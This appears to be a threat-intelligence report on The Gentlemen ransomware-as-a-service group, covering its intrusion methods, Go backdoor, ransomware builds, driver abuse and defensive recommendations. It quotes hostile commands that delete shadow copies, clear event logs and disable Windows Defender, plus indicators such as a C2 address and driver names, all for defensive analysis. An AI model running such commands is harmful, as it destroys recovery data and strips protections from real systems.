In the first half of 2026, this group ranks among the top 10 ransomware actors by the number of victim announcements on its data leak site (DLS).
What The Gentlemen are doing and where they hit
The Gentlemen is a ransomware-as-a-service (RaaS) operation that began ramping up activity at the start of 2026 and has been observed by Kaspersky since February 2026. Targets span manufacturing, IT services, healthcare, financial services, construction, and logistics, with the heaviest observed intrusion activity in Brazil, China, Indonesia, Taiwan, and Thailand. Kaspersky reports high confidence in attributing observed activity to The Gentlemen based on recurring use of the group name, associated email addresses, and a single Data Leak Site referenced inside binaries and ransom notes.
Initial access, reconnaissance and lateral movement
The Gentlemen and its affiliates enter networks by exploiting internet-exposed services and by using stolen or weak credentials. The group often targets internet-facing hardware VPNs and firewalls, and Kaspersky assesses collaboration with other actors or initial access brokers is likely in some compromises. After initial access, The Gentlemen perform internal reconnaissance with tools including SharpADWS, NetScan, Advanced IP Scanner and Microsoft’s netsh. SharpADWS is used for Active Directory enumeration; netsh is used to capture network traces with commands such as netsh trace start capture=yes ..., saving captures to administrative shares for later analysis in tools like Wireshark.
For lateral movement, attackers copy ransomware to the NETLOGON share and use a customized PowerShell script, deploy_gpo.ps1, to push a Group Policy-based deployment across the domain. When GPO deployment is not feasible, PsExec is used; where PsExec is missing the ransomware will download it from https://live.sysinternals[.]com/PsExec.exe. The ransomware also queries domain computers using RSAT/PowerShell (or NetServerEnum as fallback) and pings hosts before attempting remote execution.
Custom tooling: a Go backdoor and Go ransomware with anti-analysis controls
Kaspersky observed a custom Go backdoor deployed a day before an attack. The implant collects hostname, domain, UUID (via WMI: "SELECT UUID FROM Win32_ComputerSystemProduct"), and local IPs, packs them into JSON, and opens a Yamux-backed bidirectional TCP session to the C2 at 81.177.215[.]15:9443. The implant responds to operator bytes: executing commands with cmd.exe /c when the response byte is 'c' and establishing a SOCKS proxy when it is 's'.
The primary ransomware used since mid-2025 is also Go-based. It uses a hybrid encryption scheme (Curve25519 + XChaCha20) and embeds the attacker’s public key as Base64 (HvzC6Dq/siFthWSgE5ozZyQDu9cyxIoxb3NuRHI6pDM=). To hinder sandbox and automated analysis, the binary requires a runtime password currently set to "CbdU8EgF"; without the correct password it exits. The Go builder exposes many command-line parameters—examples include --gpo to deploy via Group Policy, --spread for PsExec-based lateral movement, and --wipe to overwrite free space. The binary also creates persistence (a scheduled task named "UpdateUser" and a Run key "GupdateS"), stops Hyper-V VMs before encryption, terminates backup and management processes, and clears system restore and event logs (for example, vssadmin.exe delete shadows /all /quiet and wevtutil.exe cl System).
Tactics to disable defenses: BYOVD, drivers, registry edits and open tools
The Gentlemen use multiple techniques to neutralize security products. They employ the BYOVD approach—installing and abusing vulnerable third‑party drivers—to disable protection. Observed drivers include ProcessMonitorDriver.sys, wamsdk.sys, gamedriverx64.sys, biontdrv.sys (variants listed as biontdrv_wink.sys and biontdrv_winbs.sys), inpoutx64.sys, wsddprm.sys and havoc.sys. Open-source tools such as Windows Kernel Explorer and OpenArk64 have been used to intercept or remove security drivers. Simpler methods are also present: the group runs kavrmvr.exe to uninstall Kaspersky in observed attempts, makes registry edits to disable Windows Defender real-time protections by setting DisableAntiSpyware and several Real-Time Protection policy keys to 1, and issues PowerShell cmdlets such as Set-MpPreference -DisableRealtimeMonitoring $true -Force and Add-MpPreference -ExclusionPath 'C:\\'.
C-based implants, different crypto and operational changes
Alongside the Go toolset, Kaspersky references a C-based ESXi locker and a new Windows-targeting C ransomware currently in development and seen in a limited set of attacks. The C variant uses a different crypto stack (AES256-GCM for file content with a randomly generated key/IV encrypted by a hardcoded RSA public key), writes its ransom note via a decoded byte array into a file named !-READ-ME—-GEN-TLE-MEN-!.txt, and, unlike recent Go builds that used Tox for operator comms, the C variant’s ransom note indicates email-based contact. Several parameters in the C variant mirror the Go build (including a password gate and a --system option that creates a scheduled "TaskSystem" to run elevated), but many flags are not yet implemented—Kaspersky anticipates this variant will mature and be used more widely.
What this means for technologists, enterprise defenders, and procurement leaders
- Technologists and security teams: monitor administrative shares and NETLOGON writes, audit Group Policy and scheduled task changes (for example "UpdateUser" and "TaskSystem"), and watch for unusual netsh trace files saved to administrative shares.
- Enterprise defenders and affected organizations: prioritize vulnerability management for internet-exposed VPNs and firewalls, rotate and protect privileged credentials, and assess exposure to vulnerable third-party drivers listed by the attackers.
- Procurement leaders: validate driver provenance for shipped hardware and require vendor attestation around driver vulnerabilities and update mechanisms before deployment.
Conclusion — The Gentlemen combine commodity techniques (credential abuse, PsExec) with custom Go tooling, a bespoke backdoor, and emerging C-based implants. They explicitly embed operational defenses—password gates, custom obfuscators, and multiple lateral mechanisms—into their toolchain. Kaspersky’s telemetry shows an active program of development and testing; whether the C variant matures into a broad-scale alternative to the Go builder is an open question that defenders and procurement teams should treat as urgent.
